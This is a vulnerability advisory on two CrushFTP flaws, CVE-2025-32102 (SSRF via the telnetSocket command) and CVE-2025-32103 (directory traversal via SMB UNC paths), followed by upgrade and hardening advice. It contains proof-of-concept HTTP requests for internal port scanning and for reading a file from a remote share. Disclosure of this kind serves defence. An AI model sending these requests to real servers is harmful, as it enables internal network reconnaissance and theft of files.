# π¨ CVE-2025-32102 & CVE-2025-32103: SSRF and Directory Traversal in CrushFTP
**Author:** Rafael Pedrero
**Published:** April 4, 2025
**Source:** [Full Disclosure Mailing List](https://seclists.org/fulldisclosure/2025/Apr/17)
---
## π Overview
Two critical vulnerabilities have been identified in CrushFTP versions 9.x through 11.3.1:
- **CVE-2025-32102**: Server-Side Request Forgery (SSRF)
- **CVE-2025-32103**: Directory Traversal via SMB UNC paths
These flaws allow attackers to perform unauthorized internal network scans and access sensitive files, posing significant security risks.
---
## π οΈ Vulnerability Details
### CVE-2025-32102: Server-Side Request Forgery (SSRF)
**Affected Versions:**
CrushFTP 9.x, 10.x through 10.8.4, and 11.x through 11.3.1
**Description:**
The `/WebInterface/function/` endpoint processes `command=telnetSocket` requests with `host` and `port` parameters. Due to inadequate validation, attackers can exploit this to initiate arbitrary connections to internal systems.
**Proof of Concept:**
```http
POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080
Expected Responses:
Open Port (e.g., 8080):
<commandResult><response><id>PeT</id><data>Connected (/127.0.0.1)</data></response></commandResult>
Closed Port (e.g., 8888):
<commandResult><response><error>ERROR:java.net.ConnectException: Connection refused: getsockopt: (/127.0.0.1)</error>Error:java.lang.NullPointerException</response></commandResult>
CVE-2025-32103: Directory Traversal via SMB UNC Paths
Affected Versions:
CrushFTP 9.x, 10.x through 10.8.4, and 11.x through 11.3.1
Description:
The application fails to properly sanitize file path inputs, allowing attackers to traverse directories and access files via SMB UNC paths (e.g., \\server\share
).
Proof of Concept:
POST http://127.0.0.1:9090/WebInterface/function/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
command=readFile&path=\\192.168.1.100\shared\secret.txt
This request attempts to read secret.txt
from a shared folder on a remote server, bypassing local file access restrictions.
π‘οΈ Mitigation
Recommended Action:
Upgrade to the latest version of CrushFTP (11.3.2 or later) where these vulnerabilities have been addressed.
Additional Measures:
Input Validation: Ensure that all user inputs, especially those related to network addresses and file paths, are properly validated and sanitized.
Network Segmentation: Restrict internal network access from the application server to prevent unauthorized connections.
Monitoring: Implement logging and monitoring to detect unusual activities, such as unexpected internal network scans or file access attempts.
π References
π§βπ» About the Author
Rafael Pedrero is a cybersecurity researcher specializing in web application vulnerabilities. His contributions to the security community include the discovery and responsible disclosure of critical flaws in widely used software applications.
Stay informed and ensure your systems are up-to-date to protect against these vulnerabilities.